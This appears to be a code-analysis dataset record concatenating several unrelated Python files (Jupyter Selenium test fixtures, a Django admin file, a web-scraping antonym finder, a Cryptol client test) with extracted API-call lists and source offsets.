"howdy.core.QDialogWithPrinting",
"datetime.datetime.now",
"pathos.multiprocessing.cpu_count",
"howdy.core.convert_string_RST",
"howdy.core.HtmlView",
"howdy.email.get_email_contacts_dict",
"howdy.email.email_mygui.HowdyGuestEmailTV",
"howdy.email.email.get_summary_html",
"time.time",
"email.utils.formataddr",
"howdy.core.core.checkServerCredentials",
"howdy.email.get_email_service"
] |
[((20795, 20859), 'howdy.core.core.checkServerCredentials', 'core.checkServerCredentials', ([], {'doLocal': 'doLocal', 'verify': 'self.verify'}), '(doLocal=doLocal, verify=self.verify)\n', (20822, 20859), False, 'from howdy.core import core, QDialogWithPrinting, check_valid_RST, convert_string_RST, HtmlView\n'), ((22997, 23053), 'howdy.core.QDialogWithPrinting', 'QDialogWithPrinting', (['self'], {'doQuit': '(False)', 'isIsolated': '(True)'}), '(self, doQuit=False, isIsolated=True)\n', (23016, 23053), False, 'from howdy.core import core, QDialogWithPrinting, check_valid_RST, convert_string_RST, HtmlView\n'), ((23530, 23583), 'howdy.email.email_mygui.HowdyGuestEmailTV', 'HowdyGuestEmailTV', (['qdl', 'emailMapping', 'self.resolution'], {}), '(qdl, emailMapping, self.resolution)\n', (23547, 23583), False, 'from howdy.email.email_mygui import HowdyGuestEmailTV\n'), ((24051, 24168), 'howdy.email.email.get_summary_html', 'email.get_summary_html', (['self.token'], {'fullURL': 'self.fullURL', 'preambleText': 'preambleText', 'postambleText': 'postambleText'}), '(self.token, fullURL=self.fullURL, preambleText=\n preambleText, postambleText=postambleText)\n', (24073, 24168), False, 'from howdy.email import email, email_basegui, emailAddress, emailName, get_email_contacts_dict, get_email_service\n'), ((24267, 24323), 'howdy.core.QDialogWithPrinting', 'QDialogWithPrinting', (['self'], {'doQuit': '(False)', 'isIsolated': '(True)'}), '(self, doQuit=False, isIsolated=True)\n', (24286, 24323), False, 'from howdy.core import core, QDialogWithPrinting, check_valid_RST, convert_string_RST, HtmlView\n'), ((24392, 24405), 'howdy.core.HtmlView', 'HtmlView', (['qdl'], {}), '(qdl)\n', (24400, 24405), False, 'from howdy.core import core, QDialogWithPrinting, check_valid_RST, convert_string_RST, HtmlView\n'), ((25517, 25574), 'howdy.core.core.get_mapped_email_contacts', 'core.get_mapped_email_contacts', (['token'], {'verify': 'self.verify'}), '(token, verify=self.verify)\n', (25547, 25574), False, 'from howdy.core import core, QDialogWithPrinting, check_valid_RST, convert_string_RST, HtmlView\n'), ((25768, 25819), 'howdy.email.get_email_contacts_dict', 'get_email_contacts_dict', (['emails'], {'verify': 'self.verify'}), '(emails, verify=self.verify)\n', (25791, 25819), False, 'from howdy.email import email, email_basegui, emailAddress, emailName, get_email_contacts_dict, get_email_service\n'), ((7480, 7491), 'time.time', 'time.time', ([], {}), '()\n', (7489, 7491), False, 'import os, sys, titlecase, datetime, json, re, urllib, time, glob\n'), ((7588, 7625), 'howdy.email.get_email_service', 'get_email_service', ([], {'verify': 'self.verify'}), '(verify=self.verify)\n', (7605, 7625), False, 'from howdy.email import email, email_basegui, emailAddress, emailName, get_email_contacts_dict, get_email_service\n'), ((16356, 16385), 'howdy.email.email_basegui.PNGWidget', 'email_basegui.PNGWidget', (['self'], {}), '(self)\n', (16379, 16385), False, 'from howdy.email import email, email_basegui, emailAddress, emailName, get_email_contacts_dict, get_email_service\n'), ((18098, 18126), 'howdy.core.convert_string_RST', 'convert_string_RST', (['mainText'], {}), '(mainText)\n', (18116, 18126), False, 'from howdy.core import core, QDialogWithPrinting, check_valid_RST, convert_string_RST, HtmlView\n'), ((18226, 18282), 'howdy.core.QDialogWithPrinting', 'QDialogWithPrinting', (['self'], {'doQuit': '(False)', 'isIsolated': '(True)'}), '(self, doQuit=False, isIsolated=True)\n', (18245, 18282), False, 'from howdy.core import core, QDialogWithPrinting, check_valid_RST, convert_string_RST, HtmlView\n'), ((18359, 18372), 'howdy.core.HtmlView', 'HtmlView', (['qdl'], {}), '(qdl)\n', (18367, 18372), False, 'from howdy.core import core, QDialogWithPrinting, check_valid_RST, convert_string_RST, HtmlView\n'), ((20153, 20181), 'howdy.core.convert_string_RST', 'convert_string_RST', (['mainText'], {}), '(mainText)\n', (20171, 20181), False, 'from howdy.core import core, QDialogWithPrinting, check_valid_RST, convert_string_RST, HtmlView\n'), ((20532, 20566), 'os.path.join', 'os.path.join', (['resourceDir', '"""*.ttf"""'], {}), "(resourceDir, '*.ttf')\n", (20544, 20566), False, 'import os, sys, titlecase, datetime, json, re, urllib, time, glob\n'), ((7927, 8039), 'howdy.email.email.send_individual_email_full', 'email.send_individual_email_full', (['self.mainHtml', 'subject', 'fullEmail'], {'name': 'name', 'email_service': 'email_service'}), '(self.mainHtml, subject, fullEmail, name=\n name, email_service=email_service)\n', (7959, 8039), False, 'from howdy.email import email, email_basegui, emailAddress, emailName, get_email_contacts_dict, get_email_service\n'), ((8604, 8630), 'howdy.core.core.set_date_newsletter', 'core.set_date_newsletter', ([], {}), '()\n', (8628, 8630), False, 'from howdy.core import core, QDialogWithPrinting, check_valid_RST, convert_string_RST, HtmlView\n'), ((15536, 15562), 'titlecase.titlecase', 'titlecase.titlecase', (['title'], {}), '(title)\n', (15555, 15562), False, 'import os, sys, titlecase, datetime, json, re, urllib, time, glob\n'), ((17881, 17906), 'howdy.core.check_valid_RST', 'check_valid_RST', (['mainText'], {}), '(mainText)\n', (17896, 17906), False, 'from howdy.core import core, QDialogWithPrinting, check_valid_RST, convert_string_RST, HtmlView\n'), ((19543, 19568), 'howdy.core.check_valid_RST', 'check_valid_RST', (['mainText'], {}), '(mainText)\n', (19558, 19568), False, 'from howdy.core import core, QDialogWithPrinting, check_valid_RST, convert_string_RST, HtmlView\n'), ((20056, 20081), 'howdy.core.check_valid_RST', 'check_valid_RST', (['mainText'], {}), '(mainText)\n', (20071, 20081), False, 'from howdy.core import core, QDialogWithPrinting, check_valid_RST, convert_string_RST, HtmlView\n'), ((22051, 22113), 'howdy.core.core.get_mapped_email_contacts', 'core.get_mapped_email_contacts', (['self.token'], {'verify': 'self.verify'}), '(self.token, verify=self.verify)\n', (22081, 22113), False, 'from howdy.core import core, QDialogWithPrinting, check_valid_RST, convert_string_RST, HtmlView\n'), ((6107, 6132), 'email.utils.formataddr', 'formataddr', (['(name, email)'], {}), '((name, email))\n', (6117, 6132), False, 'from email.utils import formataddr\n'), ((7651, 7674), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (7672, 7674), False, 'import os, sys, titlecase, datetime, json, re, urllib, time, glob\n'), ((8181, 8208), 'pathos.multiprocessing.cpu_count', 'multiprocessing.cpu_count', ([], {}), '()\n', (8206, 8208), True, 'import pathos.multiprocessing as multiprocessing\n'), ((8444, 8455), 'time.time', 'time.time', ([], {}), '()\n', (8453, 8455), False, 'import os, sys, titlecase, datetime, json, re, urllib, time, glob\n')]
|
import json
import os
import pytest
import requests
from subprocess import Popen
import sys
from testpath.tempdir import TemporaryDirectory
import time
from urllib.parse import urljoin
from selenium.webdriver import Firefox, Remote, Chrome
from .utils import Notebook
pjoin = os.path.join
def _wait_for_server(proc, info_file_path):
"""Wait 30 seconds for the notebook server to start"""
for i in range(300):
if proc.poll() is not None:
raise RuntimeError("Notebook server failed to start")
if os.path.exists(info_file_path):
try:
with open(info_file_path) as f:
return json.load(f)
except ValueError:
# If the server is halfway through writing the file, we may
# get invalid JSON; it should be ready next iteration.
pass
time.sleep(0.1)
raise RuntimeError("Didn't find %s in 30 seconds", info_file_path)
@pytest.fixture(scope='session')
def notebook_server():
info = {}
with TemporaryDirectory() as td:
nbdir = info['nbdir'] = pjoin(td, 'notebooks')
os.makedirs(pjoin(nbdir, u'sub ∂ir1', u'sub ∂ir 1a'))
os.makedirs(pjoin(nbdir, u'sub ∂ir2', u'sub ∂ir 1b'))
info['extra_env'] = {
'JUPYTER_CONFIG_DIR': pjoin(td, 'jupyter_config'),
'JUPYTER_RUNTIME_DIR': pjoin(td, 'jupyter_runtime'),
'IPYTHONDIR': pjoin(td, 'ipython'),
}
env = os.environ.copy()
env.update(info['extra_env'])
command = [sys.executable, '-m', 'notebook',
'--no-browser',
'--notebook-dir', nbdir,
# run with a base URL that would be escaped,
# to test that we don't double-escape URLs
'--NotebookApp.base_url=/a@b/',
]
print("command=", command)
proc = info['popen'] = Popen(command, cwd=nbdir, env=env)
info_file_path = pjoin(td, 'jupyter_runtime',
'nbserver-%i.json' % proc.pid)
info.update(_wait_for_server(proc, info_file_path))
print("Notebook server info:", info)
yield info
# Shut the server down
requests.post(urljoin(info['url'], 'api/shutdown'),
headers={'Authorization': 'token '+info['token']})
def make_sauce_driver():
"""This function helps travis create a driver on Sauce Labs.
This function will err if used without specifying the variables expected
in that context.
"""
username = os.environ["SAUCE_USERNAME"]
access_key = os.environ["SAUCE_ACCESS_KEY"]
capabilities = {
"tunnel-identifier": os.environ["TRAVIS_JOB_NUMBER"],
"build": os.environ["TRAVIS_BUILD_NUMBER"],
"tags": [os.environ['TRAVIS_PYTHON_VERSION'], 'CI'],
"platform": "Windows 10",
"browserName": os.environ['JUPYTER_TEST_BROWSER'],
"version": "latest",
}
if capabilities['browserName'] == 'firefox':
# Attempt to work around issue where browser loses authentication
capabilities['version'] = '57.0'
hub_url = "%s:%s@localhost:4445" % (username, access_key)
print("Connecting remote driver on Sauce Labs")
driver = Remote(desired_capabilities=capabilities,
command_executor="http://%s/wd/hub" % hub_url)
return driver
@pytest.fixture(scope='session')
def selenium_driver():
if os.environ.get('SAUCE_USERNAME'):
driver = make_sauce_driver()
elif os.environ.get('JUPYTER_TEST_BROWSER') == 'chrome':
driver = Chrome()
else:
driver = Firefox()
yield driver
# Teardown
driver.quit()
@pytest.fixture(scope='module')
def authenticated_browser(selenium_driver, notebook_server):
selenium_driver.jupyter_server_info = notebook_server
selenium_driver.get("{url}?token={token}".format(**notebook_server))
return selenium_driver
@pytest.fixture
def notebook(authenticated_browser):
return Notebook.new_notebook(authenticated_browser)
|
[
"subprocess.Popen",
"json.load",
"urllib.parse.urljoin",
"selenium.webdriver.Firefox",
"os.environ.copy",
"pytest.fixture",
"os.path.exists",
"time.sleep",
"os.environ.get",
"selenium.webdriver.Remote",
"testpath.tempdir.TemporaryDirectory",
"selenium.webdriver.Chrome"
] |
[((968, 999), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""session"""'}), "(scope='session')\n", (982, 999), False, 'import pytest\n'), ((3403, 3434), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""session"""'}), "(scope='session')\n", (3417, 3434), False, 'import pytest\n'), ((3715, 3745), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (3729, 3745), False, 'import pytest\n'), ((3273, 3366), 'selenium.webdriver.Remote', 'Remote', ([], {'desired_capabilities': 'capabilities', 'command_executor': "('http://%s/wd/hub' % hub_url)"}), "(desired_capabilities=capabilities, command_executor=\n 'http://%s/wd/hub' % hub_url)\n", (3279, 3366), False, 'from selenium.webdriver import Firefox, Remote, Chrome\n'), ((3465, 3497), 'os.environ.get', 'os.environ.get', (['"""SAUCE_USERNAME"""'], {}), "('SAUCE_USERNAME')\n", (3479, 3497), False, 'import os\n'), ((534, 564), 'os.path.exists', 'os.path.exists', (['info_file_path'], {}), '(info_file_path)\n', (548, 564), False, 'import os\n'), ((878, 893), 'time.sleep', 'time.sleep', (['(0.1)'], {}), '(0.1)\n', (888, 893), False, 'import time\n'), ((1046, 1066), 'testpath.tempdir.TemporaryDirectory', 'TemporaryDirectory', ([], {}), '()\n', (1064, 1066), False, 'from testpath.tempdir import TemporaryDirectory\n'), ((1484, 1501), 'os.environ.copy', 'os.environ.copy', ([], {}), '()\n', (1499, 1501), False, 'import os\n'), ((1937, 1971), 'subprocess.Popen', 'Popen', (['command'], {'cwd': 'nbdir', 'env': 'env'}), '(command, cwd=nbdir, env=env)\n', (1942, 1971), False, 'from subprocess import Popen\n'), ((2259, 2295), 'urllib.parse.urljoin', 'urljoin', (["info['url']", '"""api/shutdown"""'], {}), "(info['url'], 'api/shutdown')\n", (2266, 2295), False, 'from urllib.parse import urljoin\n'), ((3545, 3583), 'os.environ.get', 'os.environ.get', (['"""JUPYTER_TEST_BROWSER"""'], {}), "('JUPYTER_TEST_BROWSER')\n", (3559, 3583), False, 'import os\n'), ((3614, 3622), 'selenium.webdriver.Chrome', 'Chrome', ([], {}), '()\n', (3620, 3622), False, 'from selenium.webdriver import Firefox, Remote, Chrome\n'), ((3650, 3659), 'selenium.webdriver.Firefox', 'Firefox', ([], {}), '()\n', (3657, 3659), False, 'from selenium.webdriver import Firefox, Remote, Chrome\n'), ((658, 670), 'json.load', 'json.load', (['f'], {}), '(f)\n', (667, 670), False, 'import json\n')]
|
from django.contrib import admin
from .models import Category, Post, Author
admin.site.register(Category)
admin.site.register(Post)
admin.site.register(Author)
# Register your models here.
|
[
"django.contrib.admin.site.register"
] |
[((77, 106), 'django.contrib.admin.site.register', 'admin.site.register', (['Category'], {}), '(Category)\n', (96, 106), False, 'from django.contrib import admin\n'), ((107, 132), 'django.contrib.admin.site.register', 'admin.site.register', (['Post'], {}), '(Post)\n', (126, 132), False, 'from django.contrib import admin\n'), ((133, 160), 'django.contrib.admin.site.register', 'admin.site.register', (['Author'], {}), '(Author)\n', (152, 160), False, 'from django.contrib import admin\n')]
|
#!/usr/bin/env python3
"""
This Python script is designed to query multiple online repositories for the
antonyms associated with a specific word.
"""
__author__ = '<NAME>'
__date__ = 'October 15, 2020'
__status__ = 'Production'
__license__ = 'MIT'
__copyright__ = "Copyright (C) 2020 <NAME>"
##################################################################################
# Date Completed: October 15, 2020
# Author: <NAME>
#
# Date Last Revised: September 17, 2021
# Revised by: <NAME>
##################################################################################
##################################################################################
# “AS-IS” Clause
#
# Except as represented in this agreement, all work produced by Developer is
# provided “AS IS”. Other than as provided in this agreement, Developer makes no
# other warranties, express or implied, and hereby disclaims all implied warranties,
# including any warranty of merchantability and warranty of fitness for a particular
# purpose.
##################################################################################
##################################################################################
# Python imports required for basic operations
##################################################################################
import bs4
import logging
import traceback
import re as regex
from bs4 import BeautifulSoup
from backoff import on_exception, expo
from ratelimit import limits, RateLimitException
from wordhoard.utilities.basic_soup import Query
from wordhoard.utilities import caching, cleansing, word_verification
logger = logging.getLogger(__name__)
class Antonyms(object):
"""
This class is used to query multiple online repositories for the antonyms associated
with a specific word.
"""
def __init__(self, search_string='',
output_format='list',
max_number_of_requests=30,
rate_limit_timeout_period=60,
proxies=None):
"""
Usage Examples
----------
>>> antonym = Antonyms('mother')
>>> results = antonym.find_antonyms()
>>> antonym = Antonyms(search_string='mother')
>>> results = antonym.find_antonyms()
Parameters
----------
:param search_string: String containing the variable to obtain antonyms for
:param output_format: Format to use for returned results. Default value: list; Acceptable values: dictionary or list
:param max_number_of_requests: Maximum number of requests for a specific timeout_period
:param rate_limit_timeout_period: The time period before a session is placed in a temporary hibernation mode
:param proxies: Dictionary of proxies to use with Python Requests
"""
self._word = search_string
self._output_format = output_format
self._proxies = proxies
ratelimit_status = False
self._rate_limit_status = ratelimit_status
# Retries the requests after a certain time period has elapsed
handler = on_exception(expo, RateLimitException, max_time=60, on_backoff=self._backoff_handler)
# Establishes a rate limit for making requests to the antonyms repositories
limiter = limits(calls=max_number_of_requests, period=rate_limit_timeout_period)
self.find_antonyms = handler(limiter(self.find_antonyms))
def _colorized_text(self, r, g, b, text):
return f"\033[38;2;{r};{g};{b}m{text} \033[38;2;255;255;255m"
def _backoff_handler(self, details):
if self._rate_limit_status is False:
print(self._colorized_text(255, 0, 0,
'The antonyms query rate Limit was reached. The querying process is entering a '
'temporary hibernation mode.'))
logger.info('The antonyms query rate limit was reached.')
self._rate_limit_status = True
def _validate_word(self):
"""
This function is designed to validate that the syntax for
a string variable is in an acceptable format.
:return: True or False
:rtype: boolean
"""
valid_word = word_verification.validate_word_syntax(self._word)
if valid_word:
return valid_word
else:
logger.error(f'The word {self._word} was not in a valid format.')
logger.error(f'Please verify that the word {self._word} is spelled correctly.')
def _check_cache(self):
check_cache = caching.cache_antonyms(self._word)
return check_cache
def _update_cache(self, antonyms):
caching.insert_word_cache_antonyms(self._word, antonyms)
return
def find_antonyms(self):
"""
Purpose
----------
This function queries multiple online repositories to discover antonyms
associated with the specific word provided to the Class Antonyms.
The antonyms are deduplicated and sorted alphabetically.
Returns
----------
:returns:
antonyms: list of antonyms
:rtype: list
"""
valid_word = self._validate_word()
if valid_word:
check_cache = self._check_cache()
if check_cache is False:
antonyms_01 = self._query_thesaurus_com()
antonyms_02 = self._query_wordhippo()
antonyms = ([x for x in [antonyms_01, antonyms_02] if x is not None])
antonyms_results = cleansing.flatten_multidimensional_list(antonyms)
if not antonyms_results:
return f'No antonyms were found for the word: {self._word}'
else:
if self._output_format == 'list':
return sorted(set(antonyms_results))
elif self._output_format == 'dictionary':
output_dict = {self._word: sorted(set(antonyms_results))}
return output_dict
else:
antonyms = cleansing.flatten_multidimensional_list([val for val in check_cache.values()])
if self._output_format == 'list':
return sorted(set(antonyms))
elif self._output_format == 'dictionary':
output_dict = {self._word: sorted(set(antonyms))}
return output_dict
else:
return f'Please verify that the word {self._word} is spelled correctly.'
def _query_thesaurus_com(self):
"""
This function queries thesaurus.com for antonyms associated
with the specific word provided to the Class Antonyms.
:returns:
antonyms: list of antonyms
:rtype: list
:raises
AttributeError: Raised when an attribute reference or assignment fails.
IndexError: Raised when a sequence subscript is out of range
KeyError: Raised when a mapping (dictionary) key is not found in the set of existing keys.
TypeError: Raised when an operation or function is applied to an object of inappropriate type.
bs4.FeatureNotFound: raised by the BeautifulSoup constructor if no parser with the requested features
is found
"""
try:
antonyms = []
if self._proxies is None:
response = Query(f'https://www.thesaurus.com/browse/{self._word}').get_single_page_html()
if response.status_code == 404:
logger.info(f'Thesaurus.com had no antonym reference for the word {self._word}')
else:
soup = BeautifulSoup(response.text, "lxml")
if soup.find("div", {'id': 'antonyms'}):
parent_tag = soup.find_all("div", {'data-testid': 'word-grid-container'})[1]
for link in parent_tag.find_all('a', {'class': 'css-pc0050'}):
antonyms.append(link.text.strip())
antonyms = sorted([x.lower() for x in antonyms])
self._update_cache(antonyms)
return antonyms
else:
logger.info(f'Thesaurus.com had no antonym reference for the word {self._word}')
elif self._proxies is not None:
response = Query(f'https://www.thesaurus.com/browse/{self._word}', self._proxies).get_single_page_html()
if response.status_code == 404:
logger.info(f'Thesaurus.com had no antonym reference for the word {self._word}')
else:
soup = BeautifulSoup(response.text, "lxml")
if soup.find("div", {'id': 'antonyms'}):
parent_tag = soup.find_all("div", {'data-testid': 'word-grid-container'})[1]
for link in parent_tag.find_all('a', {'class': 'css-pc0050'}):
antonyms.append(link.text.strip())
antonyms = sorted([x.lower() for x in antonyms])
self._update_cache(antonyms)
return antonyms
else:
logger.info(f'Thesaurus.com had no antonym reference for the word {self._word}')
except bs4.FeatureNotFound as error:
logger.error('An error occurred in the following code segment:')
logger.error(''.join(traceback.format_tb(error.__traceback__)))
except AttributeError as error:
logger.error('An AttributeError occurred in the following code segment:')
logger.error(''.join(traceback.format_tb(error.__traceback__)))
except IndexError as error:
logger.error('An IndexError occurred in the following code segment:')
logger.error(''.join(traceback.format_tb(error.__traceback__)))
except KeyError as error:
logger.error('A KeyError occurred in the following code segment:')
logger.error(''.join(traceback.format_tb(error.__traceback__)))
except TypeError as error:
logger.error('A TypeError occurred in the following code segment:')
logger.error(''.join(traceback.format_tb(error.__traceback__)))
def _query_wordhippo(self):
"""
This function queries wordhippo.com for antonyms associated
with the specific word provided to the Class Antonyms.
:returns:
antonyms: list of antonyms
:rtype: list
:raises
AttributeError: Raised when an attribute reference or assignment fails.
IndexError: Raised when a sequence subscript is out of range
KeyError: Raised when a mapping (dictionary) key is not found in the set of existing keys.
TypeError: Raised when an operation or function is applied to an object of inappropriate type.
bs4.FeatureNotFound: raised by the BeautifulSoup constructor if no parser with the requested features
is found
"""
try:
antonyms = []
if self._proxies is None:
response = Query(f'https://www.wordhippo.com/what-is/the-opposite-of/{self._word}.html').get_single_page_html()
if response.status_code == 404:
logger.info(f'Wordhippo.com had no antonym reference for the word {self._word}')
else:
soup = BeautifulSoup(response.text, "lxml")
pattern = regex.compile(r'We do not currently know of any antonyms for')
if soup.find(text=pattern):
logger.info(f'Wordhippo.com had no antonym reference for the word {self._word}')
else:
related_tag = soup.find("div", {'class': 'relatedwords'})
for list_item in related_tag.find_all("div", {'class': 'wb'}):
for link in list_item.find_all('a', href=True):
antonyms.append(link.text)
antonyms = sorted([x.lower() for x in antonyms])
self._update_cache(antonyms)
return antonyms
elif self._proxies is not None:
response = Query(
f'https://www.wordhippo.com/what-is/the-opposite-of/{self._word}.html',
self._proxies).get_single_page_html()
if response.status_code == 404:
logger.info(f'Wordhippo.com had no antonym reference for the word {self._word}')
else:
soup = BeautifulSoup(response.text, "lxml")
pattern = regex.compile(r'We do not currently know of any antonyms for')
if soup.find(text=pattern):
logger.info(f'Wordhippo.com had no antonym reference for the word {self._word}')
else:
related_tag = soup.find("div", {'class': 'relatedwords'})
for list_item in related_tag.find_all("div", {'class': 'wb'}):
for link in list_item.find_all('a', href=True):
antonyms.append(link.text)
antonyms = sorted([x.lower() for x in antonyms])
self._update_cache(antonyms)
return antonyms
except bs4.FeatureNotFound as error:
logger.error('An error occurred in the following code segment:')
logger.error(''.join(traceback.format_tb(error.__traceback__)))
except AttributeError as error:
logger.error('An AttributeError occurred in the following code segment:')
logger.error(''.join(traceback.format_tb(error.__traceback__)))
except IndexError as error:
logger.error('An IndexError occurred in the following code segment:')
logger.error(''.join(traceback.format_tb(error.__traceback__)))
except KeyError as error:
logger.error('A KeyError occurred in the following code segment:')
logger.error(''.join(traceback.format_tb(error.__traceback__)))
except TypeError as error:
logger.error('A TypeError occurred in the following code segment:')
logger.error(''.join(traceback.format_tb(error.__traceback__)))
|
[
"wordhoard.utilities.basic_soup.Query",
"ratelimit.limits",
"wordhoard.utilities.caching.cache_antonyms",
"traceback.format_tb",
"backoff.on_exception",
"wordhoard.utilities.cleansing.flatten_multidimensional_list",
"wordhoard.utilities.caching.insert_word_cache_antonyms",
"bs4.BeautifulSoup",
"wordhoard.utilities.word_verification.validate_word_syntax",
"logging.getLogger",
"re.compile"
] |
[((1623, 1650), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1640, 1650), False, 'import logging\n'), ((3090, 3180), 'backoff.on_exception', 'on_exception', (['expo', 'RateLimitException'], {'max_time': '(60)', 'on_backoff': 'self._backoff_handler'}), '(expo, RateLimitException, max_time=60, on_backoff=self.\n _backoff_handler)\n', (3102, 3180), False, 'from backoff import on_exception, expo\n'), ((3278, 3348), 'ratelimit.limits', 'limits', ([], {'calls': 'max_number_of_requests', 'period': 'rate_limit_timeout_period'}), '(calls=max_number_of_requests, period=rate_limit_timeout_period)\n', (3284, 3348), False, 'from ratelimit import limits, RateLimitException\n'), ((4225, 4275), 'wordhoard.utilities.word_verification.validate_word_syntax', 'word_verification.validate_word_syntax', (['self._word'], {}), '(self._word)\n', (4263, 4275), False, 'from wordhoard.utilities import caching, cleansing, word_verification\n'), ((4564, 4598), 'wordhoard.utilities.caching.cache_antonyms', 'caching.cache_antonyms', (['self._word'], {}), '(self._word)\n', (4586, 4598), False, 'from wordhoard.utilities import caching, cleansing, word_verification\n'), ((4674, 4730), 'wordhoard.utilities.caching.insert_word_cache_antonyms', 'caching.insert_word_cache_antonyms', (['self._word', 'antonyms'], {}), '(self._word, antonyms)\n', (4708, 4730), False, 'from wordhoard.utilities import caching, cleansing, word_verification\n'), ((5551, 5600), 'wordhoard.utilities.cleansing.flatten_multidimensional_list', 'cleansing.flatten_multidimensional_list', (['antonyms'], {}), '(antonyms)\n', (5590, 5600), False, 'from wordhoard.utilities import caching, cleansing, word_verification\n'), ((7711, 7747), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.text', '"""lxml"""'], {}), "(response.text, 'lxml')\n", (7724, 7747), False, 'from bs4 import BeautifulSoup\n'), ((11535, 11571), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.text', '"""lxml"""'], {}), "(response.text, 'lxml')\n", (11548, 11571), False, 'from bs4 import BeautifulSoup\n'), ((11602, 11663), 're.compile', 'regex.compile', (['"""We do not currently know of any antonyms for"""'], {}), "('We do not currently know of any antonyms for')\n", (11615, 11663), True, 'import re as regex\n'), ((7434, 7489), 'wordhoard.utilities.basic_soup.Query', 'Query', (['f"""https://www.thesaurus.com/browse/{self._word}"""'], {}), "(f'https://www.thesaurus.com/browse/{self._word}')\n", (7439, 7489), False, 'from wordhoard.utilities.basic_soup import Query\n'), ((8720, 8756), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.text', '"""lxml"""'], {}), "(response.text, 'lxml')\n", (8733, 8756), False, 'from bs4 import BeautifulSoup\n'), ((9522, 9562), 'traceback.format_tb', 'traceback.format_tb', (['error.__traceback__'], {}), '(error.__traceback__)\n', (9541, 9562), False, 'import traceback\n'), ((9724, 9764), 'traceback.format_tb', 'traceback.format_tb', (['error.__traceback__'], {}), '(error.__traceback__)\n', (9743, 9764), False, 'import traceback\n'), ((9918, 9958), 'traceback.format_tb', 'traceback.format_tb', (['error.__traceback__'], {}), '(error.__traceback__)\n', (9937, 9958), False, 'import traceback\n'), ((10107, 10147), 'traceback.format_tb', 'traceback.format_tb', (['error.__traceback__'], {}), '(error.__traceback__)\n', (10126, 10147), False, 'import traceback\n'), ((10298, 10338), 'traceback.format_tb', 'traceback.format_tb', (['error.__traceback__'], {}), '(error.__traceback__)\n', (10317, 10338), False, 'import traceback\n'), ((11236, 
11313), 'wordhoard.utilities.basic_soup.Query', 'Query', (['f"""https://www.wordhippo.com/what-is/the-opposite-of/{self._word}.html"""'], {}), "(f'https://www.wordhippo.com/what-is/the-opposite-of/{self._word}.html')\n", (11241, 11313), False, 'from wordhoard.utilities.basic_soup import Query\n'), ((12740, 12776), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.text', '"""lxml"""'], {}), "(response.text, 'lxml')\n", (12753, 12776), False, 'from bs4 import BeautifulSoup\n'), ((12807, 12868), 're.compile', 'regex.compile', (['"""We do not currently know of any antonyms for"""'], {}), "('We do not currently know of any antonyms for')\n", (12820, 12868), True, 'import re as regex\n'), ((13674, 13714), 'traceback.format_tb', 'traceback.format_tb', (['error.__traceback__'], {}), '(error.__traceback__)\n', (13693, 13714), False, 'import traceback\n'), ((13876, 13916), 'traceback.format_tb', 'traceback.format_tb', (['error.__traceback__'], {}), '(error.__traceback__)\n', (13895, 13916), False, 'import traceback\n'), ((14070, 14110), 'traceback.format_tb', 'traceback.format_tb', (['error.__traceback__'], {}), '(error.__traceback__)\n', (14089, 14110), False, 'import traceback\n'), ((14259, 14299), 'traceback.format_tb', 'traceback.format_tb', (['error.__traceback__'], {}), '(error.__traceback__)\n', (14278, 14299), False, 'import traceback\n'), ((14450, 14490), 'traceback.format_tb', 'traceback.format_tb', (['error.__traceback__'], {}), '(error.__traceback__)\n', (14469, 14490), False, 'import traceback\n'), ((8428, 8498), 'wordhoard.utilities.basic_soup.Query', 'Query', (['f"""https://www.thesaurus.com/browse/{self._word}"""', 'self._proxies'], {}), "(f'https://www.thesaurus.com/browse/{self._word}', self._proxies)\n", (8433, 8498), False, 'from wordhoard.utilities.basic_soup import Query\n'), ((12385, 12481), 'wordhoard.utilities.basic_soup.Query', 'Query', (['f"""https://www.wordhippo.com/what-is/the-opposite-of/{self._word}.html"""', 'self._proxies'], {}), "(f'https://www.wordhippo.com/what-is/the-opposite-of/{self._word}.html',\n self._proxies)\n", (12390, 12481), False, 'from wordhoard.utilities.basic_soup import Query\n')]
|
from os import path
import glob
from data.sr import base
class SR291(base.SRBase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def get_path(self) -> str:
return path.join(self.dpath, 'SR291')
|
[
"os.path.join"
] |
[((217, 247), 'os.path.join', 'path.join', (['self.dpath', '"""SR291"""'], {}), "(self.dpath, 'SR291')\n", (226, 247), False, 'from os import path\n')]
|
import os
from cryptol import CryptolConnection, CryptolContext, cry
import cryptol
import cryptol.cryptoltypes
from BitVector import *
dir_path = os.path.dirname(os.path.realpath(__file__))
c = cryptol.connect("cabal new-exec --verbose=0 cryptol-remote-api")
c.change_directory(dir_path)
c.load_file("Foo.cry")
x_val = c.evaluate_expression("x").result()
assert c.evaluate_expression("Id::id x").result() == x_val
assert c.call('Id::id', bytes.fromhex('ff')).result() == bytes.fromhex('ff')
assert c.call('add', b'\0', b'\1').result() == b'\x01'
assert c.call('add', bytes.fromhex('ff'), bytes.fromhex('03')).result() == bytes.fromhex('02')
cryptol.add_cryptol_module('Foo', c)
from Foo import *
assert add(b'\2', 2) == b'\4'
assert add(BitVector( intVal = 0, size = 8 ), BitVector( intVal = 1, size = 8 )) == bytes.fromhex('01')
assert add(BitVector( intVal = 1, size = 8 ), BitVector( intVal = 2, size = 8 )) == bytes.fromhex('03')
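# The `add` function here operates on 8-bit words, so the sum wraps modulo 256:
# 255 + 1 yields 0, which is what the final assertion checks.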
assert add(BitVector( intVal = 255, size = 8 ), BitVector( intVal = 1, size = 8 )) == bytes.fromhex('00')
|
[
"cryptol.connect",
"cryptol.add_cryptol_module",
"os.path.realpath"
] |
